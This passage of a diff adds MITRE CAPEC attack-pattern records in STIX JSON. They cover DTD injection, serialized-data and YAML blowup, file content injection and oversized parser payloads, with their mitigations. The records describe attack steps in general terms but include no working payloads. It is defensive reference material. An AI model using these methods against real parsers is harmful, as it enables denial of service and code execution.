+ ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.

    2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

  2. Determine use of XML with DTDs: Examine application input to identify XML input that leverage the use of one or more DTDs.

    3. Techniques
    Examine any available documentation for the application that discusses expected XML input.
    Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD.

Exploit

  1. [Craft and inject XML containg malicious DTD payload]

    2. Techniques
    Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.
    Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts.
", + "x_capec_prerequisites": [ + "The target must be running an XML based application that leverages DTDs." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa5c2311-5b43-4e21-9d1c-a3f38ff378bc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "spec_version": "2.1", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--683d38cf-120d-459e-b68f-e88ec1e6e9ea", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "spec_version": "2.1", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use XML parsing tools that protect against DTD attacks.", + "id": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--696727ca-cfe5-4525-84d1-4285f4a40004", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--781b2c2c-e9f3-4d8a-b2e3-806800893f1a", + "spec_version": "2.1", + "target_ref": "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack exploits certain serialized data parsers (e.g., XML, YAML, etc.) which manage data in an inefficient manner. The attacker crafts an serialized data file with multiple configuration parameters in the same dataset. In a vulnerable parser, this results in a denial of service condition where CPU resources are exhausted because of the parsing algorithm. The weakness being exploited is tied to parser implementation and not language specific.", + "external_references": [ + { + "external_id": "CAPEC-229", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/229.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "XML Attribute Blowup", + "external_id": "41", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Attribute-Blowup" + } + ], + "id": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data Parameter Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, assume that the victim is running a vulnerable parser such as .NET framework 1.0. This results in a quadratic runtime of O(n^2).\n \n A document with n attributes results in (n^2)/2 operations to be performed. If an operation takes 100 nanoseconds then a document with 100,000 operations would take 500s to process. In this fashion a small message of less than 1MB causes a denial of service condition on the CPU resources.\n ", + "\n A YAML bomb leverages references within a YAML file to create exponential growth in memory requirements. By creating a chain of keys whose values are a list of multiple references to the next key in the chain, the amount of memory and processing required to handle the data grows exponentially. This may lead to denial of service or instability resulting from excessive resource consumption.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process requests using serialized data.

    2. Techniques
    Use an automated tool to record all instances of URLs to process requests from serialized data.
    Use a browser to manually explore the website and analyze how the application processes requests using serialized data.

Exploit

  1. Launch a Blowup attack: The attacker crafts malicious messages that contain multiple configuration parameters in the same dataset.

    2. Techniques
    Send the malicious crafted message containing the multiple configuration parameters to the target URL, causing a denial of service.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The server accepts input in the form of serialized data and is using a parser with a runtime longer than O(n) for the insertion of a new configuration parameter in the data container.(examples are .NET framework 1.0 and 1.1)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated completely by using a parser that is not using a vulnerable container.", + "id": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Mitigation may limit the number of configuration parameters per dataset.", + "id": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-229-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4b0778c-9df8-4c69-a647-540ef4e5f2aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5dbcf5bb-4047-46ef-945a-d3b658626300", + "spec_version": "2.1", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary poisons files with a malicious payload (targeting the file systems accessible by the target software), which may be passed through by standard channels such as via email, and standard web content like PDF and multimedia files. The adversary exploits known vulnerabilities or handling routines in the target processes, in order to exploit the host's trust in executing remote content, including binary files.", + "external_references": [ + { + "external_id": "CAPEC-23", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/23.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "modified": "2022-02-22T00:00:00.000Z", + "name": "File Content Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7f0f7de2-bf09-4f60-86bb-6933192b7128" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.\n " + ], + "x_capec_extended_description": "\n Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the adversary knows the standard handling routines and can identify vulnerabilities and entry points, they can be exploited by otherwise seemingly normal content. Once the attack is executed, the adversary's program can access relative directories such as C:\\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c" + ], + "x_capec_prerequisites": [ + "The target software must consume files.", + "The adversary must have access to modify files that the target software will consume." + ], + "x_capec_skills_required": { + "Medium": "How to poison a file with malicious payload that will exploit a vulnerability when the file is opened. The adversary must also know how to place the file onto a system where it will be opened by an unsuspecting party, or force the file to be opened." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e333960-e5cb-4589-9771-ba6ba993cd18", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)", + "id": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0c333c67-716a-4a61-8bf6-5f10bc34123e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1b328f3-e5f7-4c0b-8cd1-92c178d9dffa", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7b7a16-616e-46d7-b94c-09b98235f8a0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b7de6045-8f58-4418-9b3f-fc61acce3199", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Virus scanning on host", + "id": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-23-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a05f53a8-d3f4-43a9-918b-d1d51c74287e", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1d44c0fd-4e64-4fa4-8d72-c90a53d49497", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--960af13f-fe8f-4f17-982b-7e5360329636", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "spec_version": "2.1", + "target_ref": "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.", + "external_references": [ + { + "external_id": "CAPEC-230", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/230.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Serialized Data with Nested Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by a data parser that supports using substitution on the victim's side.

Exploit

  1. An adversary crafts input data that may have an adverse effect on the operation of the parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n An adversary's goal is to leverage parser failure to their advantage. In most cases this type of an attack will result in a Denial of Service due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].\n This attack is most closely associated with web services using SOAP or a Rest API, because remote service requesters can post malicious payloads to the service provider. The main weakness is that the service provider generally must inspect, parse, and validate the messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that this attack targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975" + ], + "x_capec_prerequisites": [ + "An application's user-controllable data is expressed in a language that supports subsitution.", + "An application does not perform sufficient validation to ensure that user-controllable data is not malicious." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable data prior to passing it to the data parser routine. Ensure that the resultant data is safe to pass to the data parser.", + "id": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e30d321-aee2-4f0d-942b-aab56874c9cd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b31f921a-2494-4fb9-ac18-d36b931a8d7d", + "spec_version": "2.1", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on canonical data.", + "id": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8c47b649-733d-47c3-a553-9ef173fdeb95", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "spec_version": "2.1", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the data parser.", + "id": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-230-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--14e9f6cc-aaff-41a7-b258-5c540335632f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ebad4d6-6c54-4d17-903f-4ad0ab05a641", + "spec_version": "2.1", + "target_ref": "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-231", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/231.html" + }, + { + "external_id": "CWE-112", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/112.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-674", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/674.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Shlomo, Yona, XML Parser Attacks: A summary of ways to attack an XML Parser, 2007", + "external_id": "REF-89", + "source_name": "reference_from_CAPEC", + "url": "http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html" + } + ], + "id": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Oversized Serialized Data Payloads", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption", + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.

", + "x_capec_extended_description": "\n Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--ee525a27-de33-45e9-ba7f-f63562001a5b", + "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861" + ], + "x_capec_prerequisites": [ + "An application uses an parser for serialized data to perform transformation on user-controllable data.", + "An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser." + ], + "x_capec_skills_required": { + "High": "Arbitrary code execution", + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. Ensure that the resultant data is safe to pass to the parser.", + "id": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--abe2962c-e934-432f-9b1b-de3b76706fbc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e235322d-0b83-4799-860a-2681f51d6ea5", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7f9b18e-bc2b-4981-ac34-7d93f9d6dde7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7ca13542-450d-4218-bd44-e0cf51b2ecc3", + "spec_version": "2.1", + "target_ref": "attack-pattern--247019da-353e-4910-9d11-7dc6c0421a17", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pick a robust implementation of the serialized data parser.", + "id": "course-of-action--c7172552-a553-4ec3-ac05-d847c8f293e5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-231-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 